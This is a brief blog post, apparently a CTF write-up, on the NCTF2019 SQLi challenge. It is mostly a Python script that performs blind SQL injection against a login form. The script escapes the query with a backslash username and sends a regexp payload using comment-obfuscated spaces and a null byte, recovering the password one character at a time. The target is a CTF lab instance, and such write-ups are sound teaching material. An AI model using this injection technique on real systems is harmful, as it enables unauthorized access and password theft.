[NCTF2019]SQLi

robots.txt有个hint.txt

hint.txt说只要密码对就给flag

Mysql的正则表达式 regexp

import requests
import string
url = "http://5f80822e-bbf0-4050-ba1b-6fc9c1783ad4.node3.buuoj.cn/"
str_list = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_"

password= ""
while(True):
	for j in str_list :
		data = {
			"username" : "\\",
			"passwd" : '||/*1*/passwd/*2*/regexp/*3*/"^%s";%s' % (password+j,chr(0))
		}
		r = requests.post(url,data=data)
		if("welcome" in r.text):
			password += j
			print(password)
			break

posted @ 2020-08-08 22:47 何止(h3zh1) 阅读(1012) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

h3zh1

[NCTF2019]SQLi

[NCTF2019]SQLi

公告